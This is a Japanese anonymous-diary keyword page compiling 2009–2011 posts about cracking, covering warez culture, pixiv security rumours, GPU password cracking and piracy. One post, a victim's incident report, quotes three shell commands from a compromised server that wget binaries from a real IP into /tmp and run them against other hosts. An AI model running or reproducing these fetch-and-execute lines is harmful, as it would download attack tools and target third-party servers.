「クラック」を含む日記 RSS

はてなキーワード: クラックとは

2011-11-18

http://anond.hatelabo.jp/20111118230021

数式処理しかからないけど、maximaとかmathematica検索するといいよ。

特にmaxima無料で扱える数式処理ソフトだし、mathematicaは高機能アカデミックな場で利用されている上にp2pに流れている(絶対に違法ダウンロードクラックはするなよ!)。

API制限があるけどmathematica派生でこっちを利用するのも手。積分もできるよ。http://www.wolframalpha.com/

英語国語テスト自動生成はテンプレート文を組み合わせたり穴埋め問題生成みたいな労力は掛かるけど単純な課題に使用するんだと思う。

2011-09-29

日本海外Warezについて

動画共有サイトにおけるアニメをアップロードする際の「慣習・しきたり」にワロタwwwwww:【2ch】ニュー速VIPブログ(`・ω・´)

これを見て書きたくなったので。

日本以外のWarez

多くの場合、複数人で構成される「チーム」単位音楽映画アプリケーションゲームなどをクラックアップロードされている。

それほど専門的な知識を必要としない音楽映画アップロードを行う「チーム」は星の数ほどある一方で、リバースエンジニアリングなどの知識が必要になるアプリケーションゲームアップロードする「チーム」はそれほど多くはない。

「チーム」は、Topsiteと呼ばれるごく限られた人しかアクセスできないFTPサーバーWarezアップロードする。

Warezを扱うFTPサーバーは、アップロード量:ダウンロード可能量=1:1とか1:2とかいう制限があるのが常なので、それらTopsiteにアクセスできる人(キャリア)は「チーム」が直接アップロードしていない別のFTPサーバーに広めようとする。キャリア間の争いは熾烈で、ダウンロードからサーバーへのアップロード自動化したり、協定を結んでキャリアチームを作ったりする人もいる。

Torrentに関してもFTPと同様であり、torrentファイルストック検索可能にするトラッカーサイトにもダウンロード量に制限がある会員制のものがあるため、キャリアたちはそちらにもWarezを広めようとする。

「チーム」がリリースしたWarezがググって出てくるようなrapidshareとかオープンなトラッカーに出回るのはもっと後だ。

このように多層化されているため、「チーム」自体が摘発されることはそれほど多くない。


ちなみに「チーム」がFTPサーバーアップロードする際のファイル名や中身などについては厳格な決まりがあり、その一部はここで見ることができる。

Standard (warez) - Wikipedia, the free encyclopedia


日本Warez

日本場合は他の国と大分事情が異なり、「チーム」がリリースするという文化はほぼ無い。個人がめいめいにアップロードクラックを行っている。

とは言っても全くのバラバラというわけではなく、クラックアップロードに利用される掲示板は数カ所に固定されている。

海外のように多層化されているわけではなく、一次放流者が直接オープンP2Pとかにアップロードするのでちょくちょく逮捕されている。

P2Pが登場する以前までは、会員制の掲示板Web割れ)やFTPサーバーでのやりとりが主流だった。

当時の様子については以下の記事が非常に秀逸なので読んでほしい。

今日から僕のwarez人生について書いてみようと思うよ。 part1:アルファルファモザイクだった

Web割れはP2Pが登場してから長らく下火だったが、プロバイダP2P規制の普及やrapidshareなどの大容量ストレージサービスの登場によりここ数年でP2Pを凌ぐほどに盛り返している。今回逮捕された動画共有サイトの隆盛もこの流れに位置づけられるんじゃないかな。



参考

Category:Warez - Wikipedia, the free encyclopedia

Warez - Wikipedia

2011-09-21

Androidアプリ デフラグディスクツール(Defrag Disk Tools)について

マーケットに嘘アプリって書いたら

補足求められたので少しだけ書く。

アプリダウンロードurl

https://market.android.com/details?id=com.disk.defrag.rubiks&hl=ja

前置き

私は起動してません。

あちらこちらで見られるスクリーンショットと、逆コンパイラ結果からの推測です

検証手順

ちょっと調べればわかりますが、あえて書きません。

個人的に、クラック入り口になる知識を非アプリ開発者に広める必要性を感じていないので

わかる人に検証してもらってください。

私が検証したのはバージョン1.0です(難読化はされていませんでした)

コンパイルした結果、170行強のコードが得られました。

仕組み

以下のurlアクセスしてデフラグしているふりをし、Javascriptを介してアプリ側のダイアログを出す

http://rubiks.adzoone.com/defrag/index.php

魚拓(貼り方あってる?)

http://megalodon.jp/2011-0921-1203-48/rubiks.adzoone.com/defrag/index.php

また、su成功した場合勝手rebootする。

何か害あることしてる?

検証したバージョンでは特に害のあるような処理は見当たりませんでした。

マーケットアプリが起動できなくなった、などのレビューはたぶん濡れ衣

2011-08-27

最近カオスラウンジ問題と東方原作者の言及

すっかり皆が飽きかけて、一部のキチガイじみた人だけが執拗に問題を追いかけていた状態から進展があった模様。

今まとめてる中心人物

quadro6000という人物が中心になっている。pixivセキュリティ騒動以前にはq4500として活動していた人らしい。

まぁこういう人です

がんばれニッポン(笑)問題

8月28日まで開催の展覧会カオスラウンジ(盆)にて仲山一二三の作品「save for japan」に「がんばろうニッポン(笑)」と書いてあったという問題。

祖先の霊と交流をする「盆」を向かえるにあたり、おおきく「神霊」・「祈り」を意識したグループ展」を標榜する展示会で、「がんばろうニッポン」に(笑)を付けるセンスが非難されている。

山一二三当人はまとめ内において、震災以降も変わらず消費される萌え共同体の結束を促すスローガンのギャップに対する皮肉なのだと説明している。

台湾アートフェア「ART TAIPEI 2011」への出展

著作権侵害を含むカオスラウンジ作品が海外アートフェアに展示されることに対して反発が生まれる。

神主が再び騒動に言及

quadro6000が神主twitterにて台湾出展を通報した結果、神主から「考えておく」という返答を引き出す。

以下、私見

多分「著作権侵害が許されない悪だ」と憤る人はネットにはそこまでいないと思う。

違法ダウンロードは悪だという人でも、無断転載だらけのコピペブログは見ない、ゲーム実況やBGM違法利用のニコニコ動画も見ない、tumblrは潰れるべき…とまで言う人は少ないと思う。

カオスラウンジ執拗に怒っている人たちはふたばちゃんねるの人が中心だと思うけど、ふたばこそまさに著作権侵害コラージュ転載が転がっている無法地帯だし。

ニコニコ動画にしても、厳密に言えば同人二次創作も、立派な著作権侵害だけど、著作権侵害でも手間が掛けられていて面白ければ問題ない、という考えの人が多いと思う。

まりカオスラウンジが怒りの琴線に触れるのは著作権というよりも、「面白くない」「オタク界隈の軽視」「手間を掛けていない」「他人の労力でお金に換える」ことなんだろう。

特にコミュニティが潰れても問題ない」とまで言い放った発言が災いして、親の仇のように憎んでいる人が多いように思える。

自業自得ではあるが、この国の法律私刑を認めてはいないので、正しく裁かれる方法模索するべきだと思うのだけどね。そういう冷静さを欠いた騒動の盛り上がり方にはウンザリする。

神主の言及が騒動を変える可能性

カオスラウンジコラージュの抱える問題のうち、裁かれるべきものは「著作権侵害」でしかない。

しかし義憤で戦っている人間の多くは「著作権侵害」には直接関わらない第三者でしかなく、著作権という土俵でカオスラウンジとやりあうことができないので、

などと触れ回っている。

当然、著作権がある限りフリー素材になることはないし、顔写真コラージュ肖像権侵害名誉毀損罪適用される別次元の話なのでダブスタでもなんでもない。

外野の様々な思惑とは関係なく、「著作権者がこの騒動の落としどころをどう設定するか」というのが騒動の終着点になる。

そして神主東方Project原作者であり、三次創作であるカオスラウンジの作品に対しても権利者として申し立てすることが可能だと思われる。

著作権保護の壁

だがネット著作権侵害蔓延するように、著作権権利を付与するだけで、守る義務も守るための力も与えはしない。それどころか保護しようとした途端に高い壁が聳え立つ。

東方Projectにしても新作発売直後にゲームクリア動画や原曲BGM動画(原曲BGM転用東方二次創作ガイドライン違反)が競うようにアップロードされ野放しになっている。

まだニコニコ動画など動画共有サイトであれば、運営会社ドワンゴを介して削除申請することができるが、リアル美術作品として発表された場合には最悪の場合には司法の判断を仰ぐ必要もある。

出版社などを通じて発表された作品ならば、企業権利者を守るためのノウハウと力を蓄積されているが、個人では敷居が高い

そうしたグレーゾーン存在には、カオスラウンジのような集団を立脚させた負の側面もあるが、二次創作の活気の源泉となった正の側面もあり、一概には否定できるものではないと思うが…。(JASRACの嫌われっぷりを見よ)

ともあれ力のない個人では著作権を自力で保護することは難しく、その間隙がカオスラウンジを生み出したが、力のある神主時間と金を費やせば、決着を付けられる可能性はある。

その落としどころが受け入れられないものでも、神主を攻撃することがないといいんだけど。(カオスラウンジに制裁を加えなかったpixivがズブズブだと血祭りに上げられ、クラックされたと火を付けられたように…)

コラージュアート価値行方

個人的にはコラージュアート存在してもいいと思うんだけどね。

ただし「アートとして金銭のやり取りをするのならば、著作権侵害者としての覚悟と責任を背負う」という条件付きで。

どうせ訴えられないだろう、弁護士を出せば問題ないだろう程度の覚悟でやるのはただの下衆だと思う。(というとあいつらはそういう下衆だと決め付けようとする人がいるんだろうけど、ネット越しの情報で人柄なんて分からんよ)

十字架と覚悟を背負いながら自分の作品を磨いて、いつかオタク界隈の人間を納得させられるまで頑張ればいいんじゃないかなー程度に思っている。

2011-08-26

http://anond.hatelabo.jp/20110825145828

http://togetter.com/li/172129

これは言ってることは概ね合ってるし、このことは前の記事でも言われてる。計算量的には安全って前記事でもある

ただこれ言ってる現役プログラマーってカオスラウンジ関係者なのはわかってるよね

個人を攻撃するわけではないけれど、大震災デマツイートやってた人との関係者でもあることも知ってるよね

 

ID漏洩したわけではないのに「ID漏洩発覚」と騒いでいた人たち

>「GPGPUパスワードクラックが可能」という明白な事実誤認

騒ぎを見ていた感じじゃ、これ騒いでたのってTwitter民でしょ。発信元が誰かさんなのかもしれないけど定かじゃないので断言できない

わかりやすい言葉を選んだんだろうけど、これで余計な誤解招いたんだろうな。これは誰かさんの失態

 

>「情報流出の兆候がある」とほのめかしていた誰かさん

確かにこれは誰かさん連中が騒いでた。でもデフォルトメッセージが「it workssl!」に変わったことに対して明確な反論してる人を見ていないな

誰か明確な反論してる人っているのこれ? 反論できる人って運営しかいないんだけど、運営から何も無いから騒いだんだろう

でも一番最初に騒がれてた感じだと「あぶねえから一応ログアウトして他のパス変えようぜ!」って内容だったと思うけど、違う?

 

馬鹿が騒いでる

確かに馬鹿が騒いでるな。マジキチの連中ばっかりだけど

プライ攻撃は一部のマジキチがやってることだから、それを例にされても意味がない

マジキチ連中ばっかり例に出されてるけど、一般ユーザーの反応見た上で反論欲しいわ

2011-08-25

http://anond.hatelabo.jp/20110825142857

攻撃ではなく喚起が目的であれば、技術的解説に対して暴言を吐いて妨害したりはしないし、リプライ爆撃をする必要もありませんよね。



これだけで十分だと思いますけど追記すれば。

ID漏洩したわけではないのに「ID漏洩発覚」と騒いでいた人たち、「情報流出の兆候がある」とほのめかしていた誰かさんや、「GPGPUパスワードクラックが可能」という明白な事実誤認。

これらが業務妨害ではなく注意喚起に過ぎないとするのは、印象操作にしてもちょっと酷いのでは。

喚起サイドの目的が本当に「ID問題への対処」ならば仕様変更署名活動でもするべきだし、「セキュリティへの不安」ならば情報拡散して悪意あるハッカーの攻撃の機会を増やすのではなくIPA通報するべき。

「喚起」という建前(目的)に対して取るべき「手段」がちぐはぐだから、「攻撃(というか夏厨の狂騒?)」としか見なされないのだという点を見直すべき。

まとめ

私的な意見だが、これを見て安心したり、馬鹿が騒いでるだけかと思った人は少し考えるようにして欲しい。あまりに短絡的ではないだろうか。

Togetter - 「pixiv社長への熱い思い…受けとれ!」

うん、馬鹿が騒いでいるだけですね。

2011-08-09

pixivセキュリティ騒動についてまとめておく

togetterchromeが固まるくらい重いのと、書いてある内容に同意できてもエタ東となる4時の組み合わせは負けた気分になるので、自分用に。

最初に書いておくと、これはpixiv擁護ではない。というより、擁護できる部分は特にない。

前提知識

pixivを潰したがっている人たちというのがいて、連日火をつけようと頑張っている。

大体想像できる動機はこんなところ。

ほぼメンツは固定しているので、毎度の騒動で発生源となっているtogetterまとめを網羅的に眺めると、誰が火をつけようとしているのか分かりやすい。

はてブでいうとb:id:sa_tieb:id:katsura_1b:id:tailtame辺りが該当。彼らを駆り立てているものは一体何なのか。(なお、エタ東も方向性が違うだけで同類にカテゴライズしている)

もっとも動機が不純だからといって、成すことが正しければ良い結果をもたらすこともあるし、独善が「悪事」としか呼べない暴走を引き起こすこともある。評価は人による。

ID漏洩騒動

pixivの新規登録画面は極めてシンプルで、pixiv idの用途については特に記されていない。(※要改善

登録するとユーザーにはユニーク数字idが付与されるので、pixiv idログイン用のみだと考えている人は少なからずいるようだ。

実際にはpixiv id名でディレクトリが作られるほか、スタックフィード(活動履歴)のidアカウントを共用するpixivブログや、姉妹サイトdrawrflashで手書きできるサイト)のidとして利用されている。

pixiv idを外部から見られないものとして、個人名を使うなどする人もいて、問題となったことは過去に数度ある。id変更の機能追加をするという話もあったが今のところは実現していない。

今回の騒動の発端となったのはこのpixiv id画像絶対パスから参照可能だ、という最初から判明していたことをid漏洩だと騒ぎ立てたことから始まる。

パスロック騒動

id漏洩したわけではなく、最初からこのような仕様で、スタックフィードなどからidを参照することは可能だ」と判明したことで、祭りは次段階に移る。

パスワード総当り攻撃に対する対処がない、悪意あるユーザーブルートフォース攻撃を仕掛ければ突破されてしまう」と騒ぎ立てた。この辺りからただの言いがかりレベル

確かに現在PCスペック技術の向上は目覚しく、家庭用でもハイスペックPCがあれば簡単なパスワードであれば数分~数十分で破ることもできるとされる。

が、それはメモリ内で高速に試行できるローカル環境上の話であって、web上のパスワード認証に対して必要とする時間は全く別物という視点が抜け落ちていて、とても現実的ではない。

例えローカル上で10万回/秒でログイン試行できるPCでも、web上のパスワード認証に対しては通信とサーバーレスポンスボトルネックとなって100回/秒程度のパフォーマンスしか発揮できないと思う。

並列で大量にリクエストを殺到させればサーバーが落ちるだけだし、そもそも膨大なオーダーのログイン攻撃が仕掛けられれば、突破するより前にファイヤーウォールが異常を関知するか、サーバー管理者が気付く。

そもそもイラストコミュニティサイトに対して逮捕されるリスクを犯して潜入したところで、成りすまして暴言コメントを書いたり個人情報を抜く程度で、不正アクセスリスクにリターンが見合っていないわけで…。

大手ポータルサイト銀行携帯キャリア、有料ポイント運用するネトゲなどであればそれなりに堅牢なログイン構造にすると思うけど、お絵描きコミュニティパスロックがないというのが即叩き材料になるとは思えないが。

もちろんパスロック自体はないよりはあった方が安心できるのは間違いない。でもセキュリティ専門の人ならまずhttpsログインできないことを指摘するよね。

admin騒動

admin.pixiv.net他に接続するとグローバルIPからでもログイン認証が出てくるというもの。発覚してから1時間程度はアクセスが可能だった。

あくまでログイン認証画面が出てくるだけで、ID/パスワードが判明したわけでもなく、webログイン認証に対するブルートフォースは非現実なのは変わらないが、「クラックされた」「ロジックボムが爆発する」など大騒ぎする。

更に尾ひれが付いて「adminツールが流出した」「バックドアが仕掛けられた」「ログインキーロガーが仕掛けられている」「アクセスするとウイルスを仕込まれる可能性がある」「今すぐ退会せよ」など騒がれる。

普通に考えれば、そこまで大事になっているのであればサーバーを落とすわけで、実害はないのだろうな、と思うわけだけど「既にハッカーに乗っ取られていて、運営は手も出せないのでは」とまで言い出す人まで。

アイマス2に男キャラが追加されたのをきっかけに「可能性を生み出しただけでアウトなんだよ!」とネガキャンしまくっていた人たちを思い出す。

セキュリティ問題とギャルゲーを同一視するのは間違いだ」という指摘は正しいけれど、ハッカー映画に影響された「俺の脳内セキュリティ問題」なんてゲーム世界と大差ない。

It workssl!騒動

admin.ads.pixiv.orgに接続すると「It workssl!」と表示されるもの。これがapacheデフォルト表示「It works!」と異なることから、「ハッカーに書き換えられた、侵入の痕跡だ」と大騒ぎする。

ads.pixiv.orgは広告関連のサーバーのようで、万が一侵入されていても個人情報流出する可能性は低いのだけど、「個人情報マニアに売られている」「カード情報も抜かれている」と騒がれる。

実際にはカード情報決済代行会社が保存しているようで、アカウント不正アクセスで潜入しても見られるのはカード末尾4桁のみ。

まとめ

ID漏洩した」という新たな材料で騒ごうとしたものの、実は既出仕様だったためにパスワード総当りの「可能性」によるセキュリティ問題に切り替える。

そこから管理者ページが外部から閲覧できたことを、管理者権限が奪われた「可能性」があると話を大きくし、どうも全体の根拠が怪しいと分かると「何も言わないpixivは不誠実だ」と批判する。

ここまでサンドバックになってて何も発言せずパスロックを実装するpixivある意味凄いが、それが付け入る隙をネチネチと探すネット暇人クレーマーたちの加虐心をくすぐって余計な火種を生んでいることにいつ気が付くのか。



追記:セキュリティ関連については悪意を持ったユーザーに狙われる可能性があることから、表に告知を出さないというのがpixivポリシーらしく、直接メールで問い合わせれば返事は受け取れるそうです

不安な方はデマかもしれない情報無責任に広める前に、直接運営に問い合わせましょう。もちろんパスワードを変えるなど自衛も重要です

2011-07-29

クラッキングされたサーバで実行されていた怪しいコマンド晒す

うちの大したことに使ってもいないのに常時稼動で外部公開なサーバクラックされて以下のコマンドが実行されていた。

sh -c cd /tmp;wget ttp://195.69.220.2/dd_ssh;chmod 755 dd_ssh;./dd_ssh 50 217.79.190.53 2 >/dev/null 2>/dev/null
sh -c cd /tmp;wget ttp://195.69.220.2/slowdssh;chmod 755 slowdssh;./slowdssh  >/dev/null 2>/dev/null
sh -c cd /tmp;killall -9 ssh2;wget ttp://195.69.220.2/ssh3;chmod 755 ssh3;./ssh3 200 72.20.14.174 >/dev/null 2>/dev/null

((正式なリンクだと502エラーが出て書き込めないのでhを抜いてあります。))

このコマンドを実行するとドイツサーバからプログラムダウンロードして実行するみたい。

ちなみに、いろんなサーバssh接続を試みるプログラムっぽい。



このプログラムたちは2007年11月頃にビルドしたApache/2.0.61にぶら下がって動いていた。

ログは綺麗さっぱりなくなっていて、2011年7月24日以降の情報しか残っていなかった。

どうやって侵入して実行したのか分からなかったけど、古いApacheと一緒に動いていたのでApache更新しなかった自分が悪いと思っている。



「dd_ssh」や「ssh3」の引数を書き換えて実行してみたいけど、それって犯罪じゃないかと思うと怖くてできない。

誰か詳しく調べてちょ。

2011-07-13

GPU

最近GPUを使ったクラッキングが増えているみたい。

無線LANのWPA2やMD5なんかのクラックがあちこちで。

http://gigazine.net/news/20110707_pyrit/

http://d.hatena.ne.jp/sen-u/20110629/p1

MD5レインボーテーブルなんかがあるから

わざわざ再計算しているわけだけども。

saltとか考えるとまぁアリかな。

WPA2も、PMKと呼ばれる512bitのマスターキーを秒間8万9000個

解析可能だそうな。

Zipもあった。

Zipは元ファイルによって暗号化の結果が変化するから

レインボーテーブル方式が使えないのでブルートフォース一択のはずだが、

この動画はすごい。。(珍しく日本語

http://www.youtube.com/watch?v=3dEN9JQ3R0U

秒間6億3千万

たぶん暗号化ヘッダの12バイトファイル数だけ、

ひたすらクラックしているんだろうけど、

動画でも複数ファイルで同一パスワードを使用している)

GPUってすごい。。

試しにPIKAZIPでやってみるとCorei7で秒間600万ちょいなので約100倍。

最新CPU一年かかる計算が3.6日ってことか。

うーん。

なんか他の使い方ねーのかな。。

2011-03-27

違法コピーを無くすのは、チンパンジー英語学習

台湾人中国人の友人たち。

平気でwindows7クラックして使ったり、漫画を大量にダウンロードしている。

しかも悪びれることなく、「スゲえだろ?」的な態度。

まさかここで「違法コピーするなー!」とキレるわけにもいかいし、どうにもならないので黙って見ているが

こういう人が数億人もいるんじゃ、いくら撲滅しようとしたとこで、数百年以上必要だろう。

2010-10-27

クラッカーが今最も注目するサーバーさくらVPS

さくらVPSヤバい

何がヤバいってまずKVM実メモリ相当512MB割り当てられて高品質ネットワーク付きで980円

安い。安いってもんじゃない。

国内でOpenVZでチマチマやってる他の業者は全滅するんじゃないかってぐらい高品質サービス

とにかく安い

 

その安さに魅かれた低スキルユーザーがぞくぞくと集結しつつあるんでヤバい。非常に危ない。

rootって何でしょうか?

FTPでHTMファイルアップロードしたいのですがうまくいきません

なんて(全角で)書いちゃうような低スキルリテラシーwebサイト管理者が高密度で集まってきてる。ヤバい。

SSH認証にしてセキュアとかそういう話がまず通用しない。会話が成り立たない。そういう次元に達する気配が無い。まずセキュリティって概念自体が存在しない。激しくヤバい。

useradd testとかuseradd adminとか普通にやっちゃう感じ

もうクラッカー誘い受け状態!

 

そんな訳で乗っ取られたサーバーが同じネットワーク内のサーバーをさらに乗っ取ろうとする最強のクラックエコシステムさくらVPS内で完成しつつある

SSHブルートフォースアタック天国状態

ゾンビゾンビを生みまくり状態

しかも2週間の無料試用期間があるのでクラック用に試用する連中まで大量発生の予感

 

まあ情弱オークションでもやってろってこった

http://auction.dmm.com/

2010-09-24

EmEditorの開発がカオス状態に・・・

情報送信でスパイウェア警告、ドングル導入検討、2chで訴訟をほのめかす

体験版の30分制限

どうしてこうなった・・・

Ver.9 無料アップグレード(2009.10.13)

    正式版のダウンロードを購入者のみに制限、体験版での登録ができなくなる

    アカデミックライセンステクニカルライセンスが廃止される

    不正使用対策のため、シリアルキーが新しく変更される(要再登録)

    新しいシリアルキーに、ダウンロード時に登録したメアドが含まれるようになる

    Ver.9の購入者がVer.8を使えないことに苦情が寄せられる

    エディタの起動時に情報を送信していることが確認される(スパイウェア疑惑

    キージェネとクラック情報存在が確認され、緊急バージョンアップが行われる

    「ドングル導入を検討していた」という噂が流れる(作者本人は否定)

    ベクターで新規購入するとユーザー情報が「ベクターお客様」になることが判明

    不正使用対策で自己改変チェックが行われるようになり、起動がもっさりになる

    法人限定でシリアルの内容がメアドから会社名に変更可能になる(要申請)

    苦情を受けて、新規ユーザーにもVer.8のシリアルを発行開始(要申請)

    自分スパイウェア疑惑を棚に上げ、クラックやキージェネの危険性を警告

    Ver.9.07で自己改変チェック機能が外される

    ライセンスセキュリティポリシーの問題で公式サイトがまた荒れる

    後付けの規約変更連発で事態の収拾を図ろうとする

    作者の意に沿わない発言をする者に対し、公式フォーラムからの退会を勧告

    作者から一方的に議論打ち切り宣言が出される(掲示板の一部がロックされる)

    作者が2ちゃんねる降臨。「テンプレを削除しないと訴えるぞ」と恫喝

    公式サイトトリップが一致し、本人の書き込みであることが確認される

    しかし、まったく効果がなく、わずか1日で2ちゃんねるから撤退

Ver.9(の続き)

    Ver.9.09で登録情報の送信回数が減らされ、同時にキージェネ対策が行われる

    返金を申し入れたユーザーメールスパムフォルダに振り分けられていたことが発覚

    公式サイトリニューアルで、ロックされていた掲示板が削除される

    Norton Anti VirusがVer.9.11スパイウェアの可能性があると警告

    公式で報告された不具合ユーザー環境のせいにして済まそうとする

    このスレの指摘で上記の問題がソフト本体のバグであったことが確認される

    確認ダイアログの表示前に、通信をしている可能性が指摘される(9.14で修正?)

    プレミアムサポート(年額40,000円)が導入される

Ver.10 無料アップグレード(2010.7.1)

    Ver.10で再度シリアルキーが変更される

    体験版の使用制限が強化され、30分ごとにソフトが強制終了するようになる

    別バイナリ疑惑対応するため、ハッシュ値の公開を開始

   「次のバージョン体験版の30分制限は外します」発言

    体験版の制限が30分ごとの強制終了から30分ごとの警告ポップアップに変更

   「印刷時のフォント計算バグは次のメジャーアップデートまで直しません」発言

Ver.11 有料アップグレード(予定)

2010-08-21

http://anond.hatelabo.jp/20100820234923

来ないと思うよ

自炊自分料理する感じで直感的に分かりやすいからな

本当の語源としては「自分で吸い出し(リッピング)」だから、クラックの直訳の割れよりハードル高いけど

2010-08-19

http://anond.hatelabo.jp/20100819110617

とりあえず、自分の家にトイレから風呂まで

隅々に監視カメラがしかけられ、盗撮や盗聴をされている。

外出すると雇われた探偵か何かにつけまわされて

行動を観察されている。

みたいな感じです。

最初の頃はパソコンクラックされて、ネットストーキングされていたのが

どんどんエスカレートしていって…って感じですね。

もちろんこの投稿も彼らは全て見ています。


それとこの事を世間にバラすと様々な嫌がらせをするという脅しもしているようです。

2010-06-30

自転車買ったけど、なかなか乗る機会がない。

今度の休みにどこかいけるかなあ。

ロードバイクとしてはそれほど高いものではないんだけど、すごく美しく仕上がった。

乗るのがちょっともったいないくらい。

自分比較的雨風を気にせずに乗ってしまうので、たぶんすぐに傷ついたり色あせたりしてしまうんだけど、この美しい自転車でどこか遠くに行きたい。

今回、自転車を注文してみて思ったこと。

1、new105はそれほど高性能じゃない。

  前に使ってたコーラス2001年くらいに購入したもの。10スピード)とそれほど違いを感じない。他の自転車はもっとスムーズにみえていたけど、思ったよりも普通だった。

  変速は若干早いが、ぎこちなさがある。新しいせいか?

2、ZONDAなどの完組みホイールはそれほど大きな違いはない。

  レースに出ない限りは違いがわかりません。MAVICの2万くらいの安いホイールで十分だった。

3、最近フレームのほうがハンドリングは安定する

  10年前のフレームってヘッドチューブの規格が細いみたいだ。

  高速のときの安定感がぜんぜん違う。フレームは新しいものにする価値がある。特に山を高速で降りてくる人は新しいフレームにすると安心感が違うと思う。

4、SPDからSPD-SLにしたけど、平地ではあまり違いがわかりませんw ダンシングするか、山登りしないとあまり違いを感じない。

  むしろ新しいせいか硬さを感じる。使っていくうちに柔らかくなるのかなあ。現時点ではSPDのほうがいい感じ。

総合的に言うと、性能としては新しくした意味があまりない。

ハンドリングが安定したことがうれしい程度で、まだポジションが決まっていないので長距離を走るには不安な感じ。

最近自転車ってハンドル高の調整が面倒くさい。

実績のある古い自転車のほうが安心感がある。

もっと乗り込んでみないとなんとも言えないけど、フレームクラックが入らない限りはこの自転車は買わなかったなあ。

ちょっと早まったかも。用途的にはnew105とZONDAは余計だったな。前に使ってたコーラスとMAVICで十分だった。

まあ外見的にはおかげさまで満足なものに仕上がっている(配色的に)わけだけれども、外見にお金を使いすぎた。

そこを諦めればたぶん15万くらいは安くついたと思う。自分で色塗ればいいじゃんって感じ。(金属に美しく堅牢な塗装する方法を知らないが)

フレームクラックが入って買い換えるときには長考したほうがいいようだ。

ちょっとぐらいのクラックでは、大きな負荷を与えない限りはすぐには全部割れたりしないみたいだし。

2010-05-19

http://anond.hatelabo.jp/20100519163123

俺だって、パソコンクラックされたり、

監視カメラつけられたり、盗聴されたりしてなかったら

放っておきたいよ。

2010-04-06

ホントに危険アキバ業界Webシステム的な意味で)

某社だけでなく、本当にギリギリです。

合い見積もりという概念が無く、どこの会社技術力に疑問のある小さいベンダーを変えることなく、新しい技術サービスに取り込んでいけない、といったところです。

またシス担もWindowsの知識しかない人間がほとんどのようです。

以下、秋葉原界隈で聞いた噂と実際に起きたことなど列挙。(特定の1社ではない)

 

以上は昔の話ではなく、ここ数年の話。

おわかりいただけただろうか。



>結局たいして儲からないからまともな業者は参加しないだけなのでは?

ところが、相場から考えたらびっくりする額を支払っています。

2010-03-15

http://anond.hatelabo.jp/20100315114338

ミレニアム ドラゴン・タトゥーの女」ていう映画で、あるハッカーがとあるライターPCクラックしたら、そのライターが調査中の事件の資料のファイルが出てきて、そのファイルを読みふけっているうちに個人的に事件に興味が出てきて、資料内の暗号意味が解けたので思わずそのヒントを匿名メールライターに送りつけるという描写があって「おおう」と思った。

2010-03-02

SCEにこれから襲いかかる閏年誤判定障害の後遺症

まぁ、色々な幸運?が重なってそこまでデカイ障害にはなっていないように見える今回PS3閏年問題。

しかし、SCEはこれから対処しなければならない問題があり、企業の障害対策の観点から言えばここからが本番だ。

一応サービス業に従事するものとして、勉強を兼ねて緊急度別にどんな問題を解決しなければならないのか挙げておこうと思う。


緊急度:最大

まぁ、コレがぶっちゃけ一番でかいよね。なんせ金取ってるし。

全部の商品を調べたわけではないが、基本72時間単位課金をしている事から見て、今回の障害で72時間中最大24時間

実に契約期間の1/3も利用不可の状態にしてしまったわけで、このまま白を切るワケにはイカンよね。

何らかの保証が必要でしょう。

PSN利用規約にざっと目を通したところ、「ナニが起こっても基本的にSCE責任ありません」とか、

「最悪保証する場合も購入金額を超える保証はしません」というこの手のサービスによくある記述しか無いため

どのような保証がなされるのかは現段階で不明。

せめて障害期間に被ったレンタル契約に関しては全額返金するぐらいの対応をすれば、

多少の痛手と引換に今後のブランドへの信頼感を得られるのではないでしょうか。

つか、何の根拠も無い俺の個人的な予想では、痛手ですら無い額だと思うけどね。


緊急度:大

上とまとめても良かったんだけど、ビデオレンタルは利用期間が短く障害の影響がほかと比べて甚大すぎる為切り分けました。

その他課金サービスに関しては、殆どがSCEを通して他の企業が提供しているサービスなので、企業契約SLAがどうなっているか

によるのですが、ぶっちゃけその辺の契約なんて分かる訳ないので割愛。まぁ、丸一日商売の邪魔したわけなので、

お咎めなしってワケには行かないでしょうね。お偉方が菓子折り持って謝罪行脚程度で済めばいいんですが。


緊急度:中

ウチのPS3は運良く障害期間に全く利用しなかったのと、まだ情報を集めてないのでコレがどうなったか分かってないんですが、

報告にはセーブデータがイカれた、テーマがイカれた、トロフィーデータが消えた等の報告が上がってました。

トロフィーは同期してない分は復旧無理だろうけど、ぶっちゃけ他に比べたら緊急度低すぎてココに含めなくても良かったぐらいですが

一応おなじデータって分類なのまとめました。

購入したDLCについてはアカウント情報さえ手元にあれば購入履歴から再度DLし直せばいいので、謝罪文のみですむ場合がほとんどでしょう。


ただ、セーブデータに関しては対応を間違うと今後の商売に響きかねないので注意が必要でしょう。

とはいえ、たぶん最終的には諦めてもらうしかないんですけどね。

セーブデータに関しては、発売当初誰とでもセーブデータの交換がネットを通じて出来ると言う恐ろしいまでのオープン姿勢から一変、

オンラインゲームが増えてきたこともあり管理が非常に厳重となっております。万が一破損フラグを立てるだけでデータはそのまま残っていた場合でも

コレをパッチ等で復旧させるのは、技術的には簡単でもPSNの今後を考えると絶対に行えない対処です。

なぜかというと、今年に入ってPS3ファームウェアが完全にクラックされてしまった可能性があるからです。

iphoneJailBreak等で名を馳せたとあるクラッカー年末年始あたりからPS3に手を出し、実質5週間で完全にクラックした、という報告を自身のサイト

発表したと言うニュースがありました。コレがすぐ割れにつながるわけではないですが、最高レベルシステム権限すら握れてしまうらしく、事実であるなら

破損フラグ除去パッチなど、どう考えても配信できる訳ない。手がかり無しで自体を把握しなければならないクラッカーにわざわざヒントを与えることになりかねず

泥棒に追い銭やるようなもんだからです。

というわけで、誤って起動してデータが破損してしまった方は残念ですが諦めた方が良さそうな感じ。

オンラインに関係ないゲームなどは多少融通が効くかもしれないですが、そのへんはゲームタイトルによるのかもしれません。


緊急度:低

まぁ、緊急度ゼロでも良かったんだけどwww

コレはぶっちゃけどうでもいい。大した影響ないから。外野が多少喚いたところで今のPS3の勢いなら何の影響もないでしょう。

地デジ需要も見込めそうだしね。


長々と書いたけど、こんなもんじゃなかろうか?どう対応するのか見ものです。

何もしないってことは.....流石にないよね?特に課金関連。

まぁ、他人事なので興味深く見守りたいと思います。

2010-01-08

ネットエージェントSHA-1クラック課題を解いているが、英単語辞書で試した所駄目だったので総当たりでやってるところなのだがpvaaaaaまで試して駄目だったのでさじを投げそうだ。もっとよく考えて並列にしないと早く答えが出ないかも。

2009-11-04

クラックしてると思われてた

死にたい

PG

ネット閲覧、△オフィスソフト操作 ぐらいの知り合いと

「それはPC使えばできるんじゃない?」(若干ダークサイドの話)

のようなパソ話してたら、なぜか、

